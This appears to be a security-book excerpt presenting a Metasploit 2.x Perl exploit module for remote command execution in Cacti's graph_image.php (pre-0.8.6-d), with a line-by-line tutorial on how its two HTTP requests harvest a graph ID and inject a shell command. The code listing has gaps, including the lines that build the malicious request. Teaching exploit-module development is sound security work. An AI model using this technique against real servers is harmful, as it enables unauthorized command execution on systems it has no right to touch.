Please note that the following code is intended for use within the Metasploit 2.x framework:
1 ##
2 # This file is part of the Metasploit Framework and may be redistributed 3 # according to the licenses defined in the Author's field below. In the 4 # case of an unknown or missing license, this file defaults to the same 5 # license as the core Framework (dual GPLv2 and Artistic). The latest 6 # version of the Framework can always be obtained from metasploit.com.
7 ##
18 'Name' => 'Cacti graph_image.php Remote Command Execution', 19 'Version' => '$Revision: 1.4 $',
20 'Authors' => [ 'David Maciejak <david dot maciejak at kyxar dot fr>' , 21 'Arch' => [ ],
22 'OS' => [ ], 23 'Priv' => 0, 24 'UserOpts' =>{
25 'RHOST' => [1, 'ADDR', 'The target address'], 26 'RPORT' => [1, 'PORT', 'The target port', 80],
27 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], 28 'DIR' => [1, 'DATA', 'Directory of cacti', '/cacti/'], 29 'SSL' => [0, 'BOOL', 'Use SSL'],
30 },
31
32 'Description' => Pex::Text::Freeform(qq{
33 This module exploits an arbitrary command execution vulnerability in 34 the RaXnet Cacti 'graph_image.php' script. All versions of RaXnet Cacti 35 prior to 0.8.6-d are vulnerable.
36 }),
37 'Refs' =>[
38 ['BID', '14042'], 39 ['MIL', '96'],
40 ],
41 'Payload' =>
42 {
43 'Space' => 128,'Keys' => ['cmd','cmd_bash'],
44 },
45
46 'Keys' => ['cacti'],
47 'DisclosureDate' => 'Jun 23 2005',
48 };
49
50 sub new {
51 my $class = shift;
52 my $self = $class->SUPER::new({'Info' => $info, 'Advanced' =>
53 $advanced}, @_);
59 my $target_host = $self->VHost;
60 my $target_port = $self->GetVar('RPORT');
61 my $dir = $self->GetVar('DIR');
62 my $encodedPayload = $self->GetVar('EncodedPayload');
63 my $cmd = $encodedPayload->RawPayload;
64
65 $cmd = Pex::Text::URLEncode($cmd);
66
67 my $listgraph = $dir.'graph_view.php?action=list';
68 my $requestlist =
69 "GET $listgraph HTTP/1.1\r\n".
70 "Accept: */*\r\n".
71 "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
72 "Host: ".$self->VHost.":$target_port\r\n".
73 "Connection: Close\r\n".
74 "\r\n";
75
76 my $s = Msf::Socket::Tcp->new(
77 'PeerAddr' => $target_host,
78 'PeerPort' => $target_port,
79 'SSL' => $self->GetVar('SSL'),
80 );
81
82 if ($s->IsError){
83 $self->PrintLine('[*] Error creating socket: ' .
$s->GetError);
84 return;
85 }
86
87 $self->PrintLine("[*] Establishing a connection to the target to get 88 list of valid image id ...");
89
90 $s->Send($requestlist);
91
92 my $resultslist = $s->Recv(-1, 20);
93 $s->Close();
94
95 $resultslist=~m/local_graph_id=(.*?)&/ || $self->PrintLine("[*]
Unable
96 to retrieve a valid image id") && return;
97
107 "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
108 "Host: ".$self->VHost.":$target_port\r\n".
117
118 if ($s->IsError){
119 $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
120 return;
121 }
122
123 $self->PrintLine("[*] Establishing a connection to the target to 124 execute command ...");
125
126 $s->Send($request);
127
128 my $results = $s->Recv(-1, 20);
129
130 if ($results=~ /^transfer-encoding:[ \t]*chunked\b/im){
131 (undef, $results) = split(/YYY/, $results);
132 my @results = split ( /\r\n/, $results );
139 (undef, $results) = split(/YYY/, $results);
140 my @results = split ( /\r\n/, $results );
141 chomp @results;
142 $self->PrintLine("[*] Target may be not vulnerable");
143 $self->PrintLine("$results");
152 my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST');
153 return $name;
154 }
155 156 1;
In-Depth Analysis
Lines 9 through 12 are utilized to declare the name of the module corresponding to the package name, and which module needs to load (in msfconsole we call the use command to load the module).
Module variables and options are defined at lines 15 through 48.
Line 15 defines the $advanced variable to no advanced options; these special options are viewable under msfconsole when we call the show advanced command.
Lines 17 through 48 define the $info variable containing current module information.
Line 18 (Name) defines the short module name.
Line 19 (Version) defines the current module version.
Line 20 (Authors) defines the author name with the mail address.
Line 21 (Arch) defines architecture (in the example none is specified).
Line 22 (OS) defines the OS (in the example none is specified).
Line 23 (Priv) defines if needed to enable (when set to 1) payload that requires privi-leged permissions; in the example the setting is 0.
Lines 24 through 30 (UserOpts) define the options parameter that will interact with the user.
Line 25 defines the RHOST variable that is required (set to 1).The type is IP address, and the description is The target address.
Line 26 defines the RPORT variable that is required (set to 1).The type is port, the description is The target port, and the default value is 80.
Line 27 defines the VHOST variable that is optional (set to 0).The type is data string, and the description is The virtual host name of the server.
Line 28 defines the DIR variable that is required (set to 1).The type is data string, the description is Directory of cacti, and the default value is /cacti.
Line 29 defines the SSL variable that is optional (set to 0).The type is Boolean, and the description is Use SSL.
Line 32 (Description) defines the module description about what the exploit does.
Lines 37 through 40 (Refs) define the external references. In the example, the external references are BugtraqId and Milw0rm.
Lines 41 though 44 (Payload) define what exploit payload can be chosen when we call the show payloadscommand under msfconsole, as well as what space in bytes the payload can take. For this module we just want the user to be able to execute a shell command
Line 46 (Keys) defines the module inner single reference used by msfweb to categorize exploits by application.
Line 47 (DisclosureDate) defines the disclosure date of the flaw.
Lines 50 through 55 define a standard function named by default new to init the package when new instance is created; it is a Perl constructor equivalent.
Lines 57 through 148 contain the main function exploit code named by default Exploit;
we will see how to use user-supplied options to create dynamic malicious HTTP GET requests.This function is called when you invoke exploit in msfconsole.
For exploiting this flaw, we need a valid Cacti image ID.That’s why the attack will take place two times.
First HTTP request grabs a valid image ID; this value is then passed in the malicious HTTP request, as in Figure 6.1.
Figure 6.1 An Exploit Explained
At lines 58 through 65, local variables are defined.These variables take the value given at runtime by the user. At line 62, we grab the requested payload by the user; note that this payload can be only one of the payloads defined in module header line 43, and the com-mand string has been set to not exceed 128 bytes. In the example, we will not use the encoded payload; we just want the user to be limited by the Metasploit console to enter a command string that will be used in the dynamically generated URL request.That’s why at line 65 we encode the command string by calling:
Pex::Text::URLEncodeupon $cmd
Lines 67 through 74 define the creation of the first GET HTTP request; by concate-nating $dir value with graph_view.php?action=list,we just pass to graph_view.php script list value to action variable to get a list of known image IDs. If you are not familiar with the HTTP method, consider reading RFC-2616 “Hypertext Transfer Protocol – HTTP/1.1”
(www.ietf.org/rfc/rfc2616.txt).
Lines 76 though 90 create a TCP socket with user options set, and send the forged HTTP request to the Web server. A test is done to validate the socket creation.
Lines 92 through 98 wait for the HTTP return page and extract the image ID from it with a regular expression. If you don’t know what a regular expression is, you should look at
perlre; to resume, it’s just an expression that defined the string syntax and can then extract all or some parts of it.This ID is stored in $valid_graph_id variable for future use.
Lines 100 through 110 are dedicated to the creation of the second request, the malicious one. Why do we name it malicious? Because at lines 101 and 102, we defined the exploit request based on the security advisory and on the $valid_graph_id value grab before.The command string set by the user and stored in variable $cmdis prefixed and suffixed with arbi-trary strings (in the example, it is YYY).This will help to extract the return command result from the rest of the HTTP page.
Lines 112 through 126 create a TCP socket with user options set, and send the forged HTTP request to the Web server. A test is done to validate socket creation.
Lines 128 through 148 wait for and analyze the HTTP return page. Here again, a reg-ular expression is used to identify whether the entity body return page transfer encoding is applied with chunked encoding to detect if the server has closed the connection.The chunked encoding modifies the body of a message to transfer it as a series of chunks (see RFC 2616:Transfer Codings paragraph).
If the page received is returned chunked-encoded by the Web server, it means that the system command has been run. We then need to extract the command result from other parts of the page. We split stream upon the tag YYY, which we inserted before. After that, we again split each line entry upon carriage return and line feed chars.Then, a for-loop is done to display the resulting command line by line.
If the page received is not chunked-encoded, then the Cacti version may not be vulner-able, so we display $results value and an error message.
Lines 150 through 154 show a function named VHost to get the conditional target value on what the user supplied, return virtual host name optional value if set unless return
required target IP address value.